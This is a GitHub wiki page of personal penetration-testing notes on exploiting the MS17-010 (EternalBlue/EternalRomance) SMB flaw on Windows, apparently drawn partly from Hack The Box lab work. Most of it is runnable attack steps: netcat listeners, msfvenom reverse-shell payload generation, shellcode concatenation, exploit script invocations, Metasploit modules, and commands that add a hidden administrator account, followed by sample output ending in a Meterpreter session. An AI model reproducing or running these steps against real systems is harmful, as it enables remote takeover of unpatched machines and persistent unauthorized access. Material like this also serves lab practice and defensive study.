-
Notifications
You must be signed in to change notification settings - Fork 14
ms17_010 _cve2017_0143
lethanhtung01011980 edited this page Apr 13, 2020
·
15 revisions
Installation steps:
- https://github.com/lethanhtung01011980/Notes/wiki/impacket_ms17_010
- Use send_and_execute.py in https://github.com/helviojunior/MS17-010
Create reverse shell listener:
- nc -nlvp 5678
Get System shell:
- cd MS17-010
- python send_and_execute.py victim_ip ../revShell-winx86_p5678.exe (revShell-winx86_p5678.exe is reverse shell generated by msvenom)
Add admin user:
Ref:
- https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/
- https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/
- Eternal Romance: https://www.exploit-db.com/exploits/43970
- Eternal Blue: https://www.exploit-db.com/exploits/42315
Ref: https://wiki.jacobshodd.com/writeups/hack-the-box/blue
- Use https://github.com/worawit/MS17-010
- Sample usage: https://github.com/worawit/MS17-010/blob/master/shellcode/eternalblue_sc_merge.py
This is for Windows 7 64 bit
cd MS17-010/shellcode
nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o revshell64_10101040.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=6789
cat eternalblue_kshellcode_x64.bin revshell64_10101040.bin > 10.10.10.40.payload.bin
nc -nlvp 6789
python eternalblue_exploit7.py 10.10.10.40 shellcode/10.10.10.40.payload.bin
- Got system shell
- Search vulnerabilites by
nmap -p 139,445 -script=smb-vuln* victim_ip
- msfconsole
- search ms17-010
Check how success-rate
- use auxiliary/admin/smb/ms17_010_command
- set RHOSTS victim_ip
- run
Exploit May need to run this to open a dummy RDP if LoginError timeout
- rdesktop victim_ip
Steps
- use windows/smb/ms17_010_psexec
- show options
- set RHOST victim_ip
- run
- getsystem <====== Escalate <====== May not need
- getuid <========Get current privilege <====== May not need
- sessions 1 <====== May not need
- shell
- C:\WINNT\system32>net user newuser newpass /add
- C:\WINNT\system32>net localgroup administrators newuser /add
- rdesktop -u newuser -p newpass victim_ip <=========== May need to run this to open a dummy RDP if LoginError timeout
Sample output
- [*] Started reverse TCP handler on attacker_ip:4444
- [*] victim_ip:445 - Target OS: Windows 5.0
- [*] victim_ip:445 - Filling barrel with fish... done
- [*] victim_ip:445 - <---------------- | Entering Danger Zone | ---------------->
- [] victim_ip:445 - [] Preparing dynamite...
- [] victim_ip:445 - [] Trying stick 1 (x86)...Boom!
- [*] victim_ip:445 - [+] Successfully Leaked Transaction!
- [*] victim_ip:445 - [+] Successfully caught Fish-in-a-barrel
- [*] victim_ip:445 - <---------------- | Leaving Danger Zone | ---------------->
- [*] victim_ip:445 - Reading from CONNECTION struct at: 0x817e39f0
- [*] victim_ip:445 - Built a write-what-where primitive...
- [+] victim_ip:445 - Overwrite complete... SYSTEM session obtained!
- [*] victim_ip:445 - Selecting native target
- [*] victim_ip:445 - Uploading payload... BTVbzIuF.exe
- [*] victim_ip:445 - Created \BTVbzIuF.exe...
- [+] victim_ip:445 - Service started successfully...
- [*] Sending stage (179779 bytes) to victim_ip
- [*] victim_ip:445 - Deleting \BTVbzIuF.exe...
- [*] Meterpreter session 1 opened (attacker_ip:4444 -> victim_ip:1157) at 201x-xx-xx 01:15:31 -0400
Ref: https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/